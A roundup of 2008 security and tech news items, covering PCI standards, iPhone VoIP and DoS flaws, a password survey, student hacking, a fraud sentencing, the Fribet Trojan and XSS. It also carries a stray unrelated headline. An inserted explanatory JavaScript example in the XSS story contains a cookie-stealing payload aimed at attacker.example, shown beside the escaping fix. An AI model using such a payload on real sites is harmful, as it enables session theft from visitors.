Group releases credit-card software standard

The PCI Security Standards Council announced on Tuesday an updated version of its security standards for applications that process credit-card transactions, aiming to prevent data breaches such as those at Hannaford Bros. and the TJX Companies.

Known as the Payment Application Data Security Standard (PA-DSS), the compliance effort will allow the Council to become a "one-stop shop" for merchants who want to find applications and services that will not increase their exposure to attacks, a PCI Security Standards Council spokesperson said. Version 1.1 of the standard is intended to make certain that payment applications do not store sensitive data, such as the information encoded on the magnetic stripe on the back of credit and debit cards.

"Having a single source of information on approved payment applications and security assessors provides business value to merchants and service providers and allows them to make informed choices regarding the security of their payment application," Bob Russo, general manager for the PCI Security Standards Council, said in a statement announcing the new standard.

The latest version of the application-security standard follows the revelation that online data thieves managed to make off with millions of credit- and debit-card numbers from grocery store chain Hannaford Bros. In 2007, retail giant TJX Companies also announced a large data breach, and by the end of the year, estimates of the size of the loss surpassed 100 million credit- and debit-card numbers. While TJX Companies had not complied with the PCI Data Security Standard, it is currently not known whether Hannaford Bros. had remained in compliance. According to Visa, about three-quarters of large companies and two-thirds of medium-sized firms had complied with the PCI's payment security standards by the end of 2007.

The PCI Security Standards Council plans to certify companies over the next year to be Payment Application Qualified Security Assessors (PA-QSAs). The application standard is based on Visa's Payment Applications Best Practices (PABP) requirements for its merchants.

Fring Brings VoIP to Hacked iPhones

Fring, the company founded by Avi Shechter, the former co-CEO of ICQ and VP at AOL, has announced a test version of its popular application, which brings Skype, MSN, Google Talk and AIM to Apple's iPhone.

"This special pre-release version of fring, developed in conjunction with the Holon Institute of Technology academic research labs is a direct response to iPhone users kicking our behind to get fring for their COOOOOL devices," the company said on its website.

"Part of the objective here (besides getting you all excited with fring for iPhone) is to get feedback prior to release of the full-feature version and create a truly superb user experience for iPhone users," Fring says.

The fring application is only available to users who have jailbroken their iPhones or iPod Touches. Apple has not endorsed it: Apple opposes VoIP applications on its handsets, because access to free calls could dramatically cut into the profit margins of the carriers licensed to supply the device, and large margins are central to everything Apple does (its Mac desktop computers included). The application also runs in the background, which Apple forbids for third-party software.

Of course, the iPod Touch has no built-in microphone, so you need the Touchmods dock connector microphone.

Fring, also co-founded by Boaz Zilberman and Alex Nerst, is headquartered in Israel, and has representation in Italy, UK and Germany. In February, BusinessWeek reported that more than 100,000 new users from 160 countries were downloading, installing, and registering to use fring each month.

iPhone vulnerable to DoS attack

A security firm claims to have uncovered a denial-of-service vulnerability in version 1.1.4 of Apple's Safari web browser for the iPhone.

Radware said that the phone is vulnerable to DoS attacks owing to a design flaw that may be triggered by a series of memory allocation operations on the dynamic memory pool, which in turn triggers a bug in the garbage collector.

"While vendors are struggling to push new products and applications, it is evident that security still remains a secondary concern," said Itzik Kotler, security operation centre manager at Radware.

"Hackers continue to misappropriate other people's software and their job is made easier by design flaws embedded into software products."

To exploit the vulnerability, an iPhone user must open an HTML page containing JavaScript that triggers the flaw.

Once the page is loaded, the application-level DoS crashes the Safari browser and could go as far as crashing the iPhone completely.

Users could be lured to sites containing this attack via links in spam messages or other social engineering techniques.

It is unclear whether the fault can cause any permanent damage to the phone or is simply a nuisance.

Women love chocolate more than password security

Women are four times more likely than men to give out "passwords" in exchange for chocolate bars.

A survey of 576 office workers in central London found that women are far more likely than their male counterparts to give away their computer passwords to total strangers, with 45 per cent of women versus ten per cent of men prepared to hand over their login credentials to strangers masquerading as market researchers.

The survey, conducted outside Liverpool Street Station in the City of London, was actually part of a social engineering exercise to raise awareness about information security in the run-up to next week's Infosec Europe conference.

Infosec has conducted similar surveys every year for at least the last five years involving punters apparently handing over login credentials in exchange for free pens or chocolate rewards.

Little attempt is made to verify the authenticity of the passwords, beyond follow-up questions asking what category it falls under. So we don't know whether women responding to the survey filled in any old rubbish in return for a choccy treat or handed out their real passwords.

This year's survey results were significantly better than in previous years. In 2007, 64 per cent of people were prepared to give away their passwords for a chocolate bar, a figure that dropped to 21 per cent this time around.

So either people are getting more security-aware or more weight-conscious. And with half the respondents stating that they used the same passwords at home and work, then perhaps the latter is more likely.

Taken in isolation the password findings might suggest the high-profile HMRC data loss debacle had increased awareness about information security. However, continued willingness to hand over personal information that could be useful to ID fraudsters suggests otherwise.

The bogus researchers also asked for workers' names and telephone numbers, ostensibly so they could be entered into a draw to win a trip to Paris. With this incentive 60 per cent of men and 62 per cent of women handed over their contact information. A similar percentage (61 per cent) were happy to hand over their dates of birth.

PBB Teen Editon Plus Scandal ( Beauty )

Students hack into school computer system in western New York

WILLIAMSVILLE, N.Y. (AP) - Authorities say several current and former students broke into a school district's computer system in western New York last month and copied secure files that included the personal information of employees.

The computer breach by Williamsville North High School students marks the third incident in the past month. Students in the Grand Island and West Seneca districts have been charged with unauthorized computer use.

Amherst Police Chief John Askey tells the Buffalo News that students overrode the security defenses of a classroom computer at Williamsville North and went trolling for information.

At least three individuals are suspected, and several more knew about it. Those involved have told police they simply were interested in how far they could get into the system.

Askey adds that several of the hackers are considered "very bright kids" and good students with no lengthy disciplinary records. It may take weeks to determine the extent of the breach.

Superintendent Howard Smith sent a letter this week to the district's 1,800 employees, asking them to notify police if they uncover any suspicious credit card or banking activity.

Copyright 2008 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.

Semiautonomous orbs rock Yuri's Night

MOUNTAIN VIEW, Calif.--Corey Fro is chasing a large metal orb across the pavement at the NASA Ames Research Center here. He is desperately trying to make sure that the orb doesn't crush a nearby robot.

The orb in question is being remotely directed by a kid wielding an Xbox-like wireless controller, but it's the kid's first time using the device, and he really doesn't have any idea what he's doing.

And that's why the orb has rolled away and is bearing down rapidly on the unsuspecting and defenseless robot a few yards away. In the end, Fro caught the wayward sphere and saved the day, or at least the innocent robot.

If this sounds unusual, it isn't. At least not at Yuri's Night, a 12-hour celebration of space, science, music, and art held at NASA Ames and other locations around the world Saturday in honor of Russian cosmonaut Yuri Gagarin's first flight into space.

The orb is part of Swarm, a project designed for Burning Man built around the concept of autonomous spheres that can be programmed to perform in one of many ways.

Or, as Fro put it, "They're kinetic sculptures that drive around in an autonomous but choreographed pattern."

Fro is just one of about 30 people who built the orbs for Burning Man 2007, and now the project is returning to Burning Man 2008 as an art piece partially funded--and therefore honored as noteworthy--by the curators of the annual countercultural arts festival.

But before it can go back out to the Nevada desert, Swarm had to make an appearance at Yuri's Night, and it was certainly one of the main attractions for the thousands in attendance Saturday.

And that's at least in large part because of what they can do.

"The orbs control their own movement, light show, and music," explained Fro. "The way they do that is by communicating with the mother node."

"The Swarm of autonomous beings by their very nature will have emergent and complex behavior," the project's Web site states. "They will flock, flirt, dance and interact, and their actions will surprise and astonish even us, their creators. They are simple, but together they will behave in ways more complex than we can predict."

The idea is that five of the six orbs--which look something like specialized see-through hubcaps turned into spheres with really expensive robotic controls and LEDs inside--are subservient to the desires of the lead orb, or mother node.

The only information the subservient orbs send out is GPS and accelerometer data, which they send to the lead orb, which, Fro said, uses that information to coordinate the movements and lighting effects of all the spheres.

"So the movement coordination allows it to follow the leader, drive in patterns or (even) make the orb representation of planetary systems," Fro said. "But once they're running under control of the mother node, there's no control from humans."

That means that once all the orbs are in motion--something that wasn't on display at Yuri's Night--the only way to stop them is to direct the mother node to stop.

Each orb, Fro said, is driven by counterbalancing using the weight of lead-acid batteries as ballast. By swaying the ballast forward, the orb moves forward as the center of gravity changes.

"To turn right or left," Fro said, "we swing the ballast right or left."

At Burning Man, where the entire project, in its 2008 configuration, will be unfurled, the Swarm team plans to erect a mast on the open desert floor that projects a large laser circle on the ground.

The idea is to define a safety zone so that pedestrians, bicyclists, and those on other forms of conveyance are safe.

"If they walk into that circle," Fro said, "all bets are off."

I was very happy to see the orbs at Yuri's Night because Swarm was one of the legendary art projects I missed at Burning Man 2007. It was something I heard a lot of people talk about after the fact in very reverent terms.

And as befits many Burning Man art projects, the 2008 version is sure to be new and improved. In fact, Fro said, the Xbox-like controllers were a big part of what's new for this year: joysticks that can allow anyone to take very subtle control over the orbs.

But it's also very easy to lose control of them, as I saw multiple times on Saturday as Fro would hand the controller over to one person or another.

"Try not to rock it so much," he said to someone at one point, "because if you hit the kill switch, it will stop."

Colombian cyber-crook jailed for nine years

A Colombian citizen has been sentenced to nine years in prison for a complex computer fraud which affected more than 600 people.

Mario Simbaqueba Bonilla, 40, was also sentenced to three years supervised release on his exit from prison, and ordered to pay restitution of $347,000.

Simbaqueba Bonilla pleaded guilty in January to charges of conspiracy, access device fraud and aggravated identity theft.

According to the charges Simbaqueba Bonilla, alone and in concert with a co-conspirator, engaged in a complex series of computer intrusions, identity thefts and credit card frauds designed to steal money from payroll, bank and other accounts.

The court recognised the attempted and actual loss from the scheme at $1.4m.

Much of the identity theft, initiated from computers in Colombia, targeted individuals residing in the US, including Department of Defense personnel.

Simbaqueba Bonilla used the money to buy expensive electronics and luxury travel and accommodation in various countries, including Hong Kong, Turks and Caicos, France, Jamaica, Italy, Chile and the US.

The conspiracy ran from 2004 to 2007 and began with the illegal installation of keystroke logging software on computers in hotel business centres and internet lounges around the world.

This software collected the personal information of those who used the computers, including passwords and other identifying information used to access bank, payroll, brokerage and other accounts online.

Simbaqueba Bonilla used the data to steal or divert money into accounts he had created in the names of other people he had victimised in the same way.

Through a complex series of electronic transactions designed to cover his trail, Simbaqueba Bonilla transferred the stolen money to credit, cash or debit cards and had the cards mailed to himself and others at commercial mailing addresses.

Federal agents arrested Simbaqueba Bonilla when he flew into the US in August 2007.

At the time of his arrest, Simbaqueba Bonilla was flying on an airline ticket purchased with stolen funds, and had in his possession a laptop also purchased with stolen funds.

The laptop contained the names, passwords and other personal and financial information of more than 600 people.

Database Trojan infests pro-Tibet websites

Security researchers have unearthed more details about a Trojan that targets backend databases as well as desktop clients.

The Fribet Trojan has been planted on pro-Tibet websites, possibly using a Vector Markup Language flaw (MS07-004) patched by Microsoft early last year. When visitors to the pro-Tibet websites are infected, the Fribet Trojan creates a backdoor on compromised hosts.

In addition, the Trojan loads a "SQL Native Client" ODBC library and executes arbitrary SQL statements received from a command and control server. In effect, the compromised machine becomes a database client under the attacker's control: any database server it can reach and authenticate to can have its data stolen or modified.

The attacker still needs to find out the host name, database name, username and password. However, monitoring functions included with Fribet as well as easily-guessable weak and default values might leave the door open for hackers, net security firm McAfee reports.

The Fribet Trojan emerges little more than a month after mass SQL injection attacks that injected iFrame links, pointing to sites hosting exploit scripts and malware, into legitimate websites.

Unlike those attacks, the Fribet Trojan can be used against sites that are protected against conventional SQL injection, as McAfee researchers Shinsuke Honjo and Geok Meng Ong explain.

"This Trojan apparently can be used as an alternate to SQL Injection attacks, but in a more direct way," they write. "Even the administrators of secure web sites, protected against common SQL injection attacks, should ensure database backends are equally secure to defend against such a penetration vector."

Hackers exploit poor website code

Web designers making very old mistakes are letting malicious hackers hijack visitors to their sites, say experts.

Many of the loopholes left in the code written for websites have been known about for almost a decade, say the security researchers.

The poor practices are proving very attractive to hi-tech criminals looking for a ready source of victims.

According to Symantec the number of sites vulnerable in this way almost doubled during the last half of 2007.

Wholly vulnerable

Kevin Hogan, director of security operations at Symantec, said the bug-ridden web code was putting visitors to many entirely innocent sites at risk.

"It overturns the whole notion that if you stay away from gambling and porn sites you are okay," he said.

The attack that a malicious hacker can carry out via these web code vulnerabilities is known as cross-site scripting (abbreviated as XSS).

Typically these involve lax control of the data being swapped between a web server and the browser program someone is using to interact with it.

An XSS vulnerability could, for instance, allow attackers to steal the login credentials of a visitor to a site.
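The mechanism described above, as an added example that is not part of the BBC article or of Symantec's report: a minimal Node.js page handler that copies a search term into its HTML unencoded, beside the same handler with output encoding, and a constructed payload of the kind used to steal a visitor's session cookie. The page, the parameter name and the attacker host are invented for illustration.

```javascript
// Added example (not from the article or from Symantec): reflected XSS and its fix.
// The search page, the "q" parameter and attacker.example are invented for illustration.

// VULNERABLE: the search term from the query string is copied straight into the page.
// A link such as /search?q=<script>...</script> runs in the visitor's browser with the
// site's origin, so the script can read document.cookie or hook the site's login form.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Output encoding for an HTML text context: neutralise the characters that can
// open a tag or an attribute. Encode & first so the entities it produces stay intact.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// FIXED: the same page with the untrusted value encoded before it reaches the browser.
function renderSearchSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Crude check a reviewer can run over rendered output: did untrusted input survive
// as live markup (a <script> tag or an inline on*= event handler)?
function containsLiveScript(html) {
  return /<script\b|\bon\w+\s*=/i.test(html);
}

// Constructed attack payload: the classic cookie-exfiltration probe.
const payload =
  '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';

// Render the payload both ways so the difference can be inspected and tested.
function demo() {
  return {
    vulnerable: renderSearchVulnerable(payload),
    safe: renderSearchSafe(payload),
  };
}

const out = demo();
console.log('vulnerable:', out.vulnerable, '-> live script:', containsLiveScript(out.vulnerable));
console.log('safe:      ', out.safe, '-> live script:', containsLiveScript(out.safe));
```

The encoded page still shows the visitor exactly what they typed; it simply no longer executes. Note that this encoding is correct for an HTML text context only; a value placed inside an attribute, a URL or a script block needs the encoding for that context, and marking session cookies HttpOnly limits what a successful injection can steal.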

Mr Hogan said more and more attackers were looking for websites that were vulnerable to these scripting attacks because they required little work to mount.

By contrast, said Mr Hogan, a phishing attack required the creation of tempting e-mails, fake servers and dead-drops to gather data.

In its most recent Internet Security Threat Report Symantec identified 11,253 specific XSS vulnerabilities in the last six months of 2007. Six months earlier the count stood at 6,961.

Symantec said there were likely many more vulnerabilities that had not been reported.

Drawing its data from XSSED, which gathers reports of these vulnerabilities, Symantec said only 473 of these loopholes had so far been fixed.

Website administrators had a poor record of closing loopholes, it said.

"Attackers..., can expect that [a] site maintainer will not address the vulnerability in a reasonable amount of time, if at all," said the report.

"There are a lot more websites out there that are prone to this," said Mr Hogan. "It's a much bigger proposition to make a safe website than it is to patch a browser."

Chris Wysopal, co-founder and chief technology officer at Veracode which produces online tools that scan code for security flaws, said the problem was getting worse.

"I do not see trends slowing this down," he said.

XSS attacks were becoming more popular because more and more websites were writing their own snippets of code so visitors could get more out of a site, he said.

Unfortunately, he added, the same mistakes were being made in this custom code years after they were first discovered.

"The problem was identified eight years ago or so," he said. "Over time attackers have figured out better and more interesting things to do with cross-site scripting."

He added: "It's such a target rich environment I do not think the attackers need to have a very sophisticated way to harvest sites for vulnerabilities."

Automated web tools were available that can scan custom web code and highlight vulnerabilities but few web designers used them, said Mr Wysopal.

"The awareness is not there that if you write code you need to test it before you put it out there," he said.